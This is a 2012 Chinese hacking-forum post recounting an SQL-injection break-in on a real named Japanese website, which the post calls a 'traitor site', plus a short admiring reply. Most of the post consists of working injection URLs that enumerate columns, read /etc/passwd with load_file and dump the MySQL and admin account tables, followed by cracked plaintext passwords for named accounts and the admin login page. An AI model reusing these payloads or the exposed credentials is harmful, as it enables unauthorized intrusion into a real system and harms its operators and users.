找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3279|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

1 Z3 t* @4 D- a) p* J
, ~0 v- E" J) ^  u9 i) o0x01. 检测 www.zuaa.jp 收集数据
0 n; Q& H: a7 k+ E
5 z( V3 v" `* ]6 E! ]9 e3 l2 z5 T' t  f
whatweb
" ?8 D( v3 o! ?6 O/ }/ w' t+ z0 c2 r- b5 C

6 o+ ^8 \4 |/ K9 p" m利用NMAP扫描
7 d/ `  Q$ o% T6 J( p6 c* L) a
; T6 E  V( |0 W: P, }) X. g: t  E中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持" k4 [: W; z, m! l
0x02.找注入点* I# k* R9 I" Z, P4 S, s
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
9 J0 {6 a: I1 j% G3 G) T
4 h8 s5 g& d* i
. s( g( Q% [# r8 B1 E' g3 m- `0x03.order by  M3 z1 C7 c8 N
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1) w$ {8 u, I- b1 f# @

6 r: K+ M+ \3 J# d- G. v# @+ Corder by 28报错,order by 27正常, d) L! Q8 i# v! a
/ [6 K3 {( Q" b5 T
0x04.   union手动查询
$ n7 l6 U5 _: T4 }http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 8 c. T/ C$ u$ w( z- l$ c% [
添加到 27 时正常显示
9 e4 m4 @$ |4 _7 ~9 k4 l6 e4 N$ e* N" u) O) ~) ?. W
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持% n3 t; p! `5 B% O2 n  \

( G/ f% J7 d  ?5 f% j( q0 I- K0x05. info:
/ X2 m9 P& z& W! \. K3 V- M  y) Ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
2 j) x) ^& j# B! X
' @7 [* b+ H  |9 D( puser:            root@localhost4 k! [5 U: v9 \" E/ y
database:    openpne
& ~1 v+ g: q1 A( Y7 F+ g3 sversion:      4.1.22
% |* [, g* n' d! f6 u! H+ O/ yos:             portbld-freebsd5.4
  n/ Z9 ~7 |; J9 \, W6 N: {" k8 z1 @& Q
0x06. root用户
) a& |9 F# T7 T2 L3 v- Y利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
. z4 t' x) f. U6 v+ l8 D% l: Khttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
# G. o6 l6 @: c* ^9 [4 k& O3 F$ K
8 m+ q2 e, @$ Z8 q6 s/ V通过工具转换/ J; p9 Z& G& ?" H# p

- c+ {, q5 J8 q2 {中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
0 D2 e% d7 i' N0 c5 p9 n' \/ R1 P* I
+ r' Q2 L$ S2 @- L9 g0 S& f0x07. 利用 into outfile" T) k- f- H+ h& L/ O
全部都失败
, K) o$ t( _+ J: B! C3 a% ?; j0 \http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php/ }0 v6 [( r+ G: j

/ ]& _9 X+ r- J: p3 chttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
% l( Z" H! ?; Q( G) V1 r
8 c6 d3 C9 ]0 c6 u, |6 p页面显示“MDB2 Error:syntax error”
% m1 p4 Q- S2 r/ @, F% a$ ]* R0 X- b, j4 H
0x08. 利用 mysql 4.15 s( s! z" a; {# C/ }5 I
猜常规表名,字段未果 工具 sqlmap
( y5 L/ [  P. `中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
4 w: O# Z! l9 b! Z9 u! N4 R/ ?6 B+ k. a, q8 N. p  H5 a

- X% H/ j7 Q3 m
+ ~3 ~6 V* \: `# }% R: N1 Y0x09. 查找后台
3 h0 r& K8 }0 l9 v! J* Z利用 现有的各种 后台工具尝试都不行4 W1 b& D- l% H+ W( U5 G
) x4 c; B& l6 _
0x10.  MySL外联方法8 i0 @* c! Y" Q% E) J
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行1 i2 F3 A* A5 v* O( Q
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user1 ]$ C( V+ e0 P2 T1 G, ~% H3 `
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user! d$ P6 G) M# ?

6 u/ y6 n* ]- R; j这个可以在 www.cmd5.com 解密' P) A, r7 g0 D/ D7 Z  W& G5 J/ |
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
) g# r$ [, h$ }! _! E' q9 Cchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
5 w# r* W1 ^) c6 n- S' wopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
  J" h7 G8 \/ K/ ~, b8 J! q/ Gzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???& T( \8 ^' E: K4 h3 K' J1 z' s! |
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知5 {6 W3 @4 |- h& X8 ?1 |- t$ ~

! T+ _% w$ p1 z! c/ c- z7 X$ o! c+ }2 N% F- [3 W( f
0x11. 网站突破
  B3 O: D$ S; _( y; o) e+ X发现网站的源程序 openpne, google 下载 openpne 源码2 w1 Q; x# c* I" h+ n
* ~/ {0 \) M2 I/ `  E

! M8 Y/ c& K+ m8 |7 V- T3 e9 N0x12. 默认信息利用
2 d" l) u; [2 u, a& ~+ G% t7 khttp://sns.zuaa.jp/?m=admin&a=page_login. v% E$ ^- ]" }  {+ m5 L

$ _0 G) @- z) |2 \% q. j$ E* M+ ^表名 (c_admin_user) ,字段名(username,password)
' J" o3 L4 ]6 V8 Dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user3 P' j, j9 g4 j+ \

8 L; X' Z% n$ d. b1 x$ X解密
8 ?' o  a& p" @/ o; @& R* H: ^zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
. T: O* p( @6 ~8 F+ e( [+ mzuaajp:c0923ec5857796a393da99905008c176,          zju1897
$ n9 v4 I; ~( k% Z2 N% y
8 c. i* L  a% j% \" h8 Z; L5 }中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
. v- l$ y9 B, ^7 K  k' m8 v3 Q5 u
0x13. 登录后台
1 ?7 B# ?2 i4 k
. f: u" g! Q% }3 ]& y
. ?/ v/ H3 ^4 v% q7 r8 n* [* f- u
  K8 ^+ d6 f5 A4 Q4 ?+ |0x14. 小结+ B$ \$ G# |8 b
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
7 i" I- E' Z4 ?" ?3 X感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
& x4 T0 ^- g  {------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain, o" f2 `; T! V% m
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
$ s8 s4 d: K/ a2 J/ ]% {
: ]2 M. D+ _# L* h$ R$ r最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!4 W& P9 o( M5 j/ ~% \

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表